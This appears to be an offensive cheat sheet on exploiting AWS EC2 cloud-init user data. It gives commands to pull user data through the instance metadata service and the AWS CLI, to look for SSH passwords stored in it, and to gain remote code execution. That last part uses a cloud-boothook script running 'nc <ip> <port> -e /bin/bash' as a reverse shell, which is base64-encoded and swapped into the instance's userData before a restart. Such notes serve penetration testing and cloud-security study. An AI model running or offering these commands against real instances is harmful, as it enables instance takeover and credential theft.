cloud-init Exploits

UserData section exploits

Enumeration

On current EC2 instance

Read the following file. Requires sudo or root privileges

sudo cat /var/lib/cloud/instance/scripts/part-001

Query IMDS

IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ec2_instance_id=$( curl -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" -s http://169.254.169.254/latest/meta-data/instance-id )
ec2_region=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest/meta-data/placement/region)
aws ec2 describe-instance-attribute --attribute userData --instance-id $ec2_instance_id--region $ec2_region --query UserData --output text  | base64 -d

Cloudshell

aws ec2 describe-instance-attribute --attribute userData --instance-id <instance id> --region <region> --query UserData --output text

Sensitive data

SSH credentials

ssh_pwauth: True #ssh password auth enabled
chpasswd:
  list: |
    <user>:<pass>

Remote Code Execution

Create a reverse shell as following

#cloud-boothook
#!/bin/bash -x
yum install -y nc && nc <ip> <port> -e /bin/bash

Encode the file

base64 reverse-shell.txt > reverse-shell.enc

Stop the instance and modify userData file associated with the instance

aws ec2 stop-instances --profile <profile> --instance-ids <instance id>
aws ec2 modify-instance-attribute --profile ec2-capstone --instance-id <ec2 instance id> --attribute userData --value file://reverse-shell.enc

Restart the instance to execute the payload. It might take a couple of minutes for the instance to reboot.

aws ec2 start-instances --profile <profile> --instance-ids <instance id>